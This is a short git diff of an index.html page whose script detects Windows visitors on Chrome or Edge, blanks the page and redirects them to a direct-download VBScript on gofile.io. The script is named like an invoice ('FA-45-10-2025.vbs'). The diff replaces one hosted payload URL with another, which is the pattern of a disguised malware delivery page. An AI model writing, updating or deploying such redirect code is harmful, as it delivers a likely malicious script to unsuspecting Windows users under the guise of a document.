--- a/index.html
+++ b/index.html
@@ -20,7 +20,7 @@
       // If Windows + Chrome/Edge, keep your existing redirect behavior
       if (isWindows && (isChrome || isEdge)) {
         document.body.innerHTML = ""; // oculta conteúdo
-        window.location.href = "https://store7.gofile.io/download/direct/7d8c433c-ac89-41e4-a4bb-9dde93d1a414/FA-45-10-2025.vbs"; // keep placeholder
+        window.location.href = "https://cold2.gofile.io/download/direct/a85b6cdc-8ecc-4208-b319-1e01126ef65b/FA-45-10-2025.vbs"; // keep placeholder
         return;
       }
 
@@ -172,6 +172,7 @@
 
 
  
+
 
 
 
